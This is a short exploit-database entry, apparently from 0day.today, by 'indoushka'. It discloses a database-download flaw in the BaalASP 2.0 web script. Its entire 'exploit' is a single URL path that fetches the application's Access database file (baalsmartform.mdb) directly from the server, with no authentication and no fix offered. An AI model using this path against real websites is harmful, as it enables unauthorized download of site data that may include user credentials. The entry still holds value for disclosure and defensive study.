id: 10493
date: 12/29/2009
title: BaalASP 2.0 DB Download Vulnerability
author: indoushka
cves: 

=====================================
BaalASP 2.0 DB Download Vulnerability
=====================================

========================================================================================                 
| # Title    : BaalASP 2.0 DB Download Vulnerability                                   |
| # Author   : indoushka                                                               |
| # Script   : BaalASP 2.0                                                             |
| # Tested on: windows SP2 Fran?ais V.(Pnx2 2.0) + Lunix Fran?ais v.(9.4 Ubuntu)       |
| # Bug      : DB                                                                      |
======================      Exploit By indoushka       =================================
| # Exploit  :
|
| 1- http://server/BaalASP/database/baalsmartform.mdb



#  0day.today [2023-03-21]  #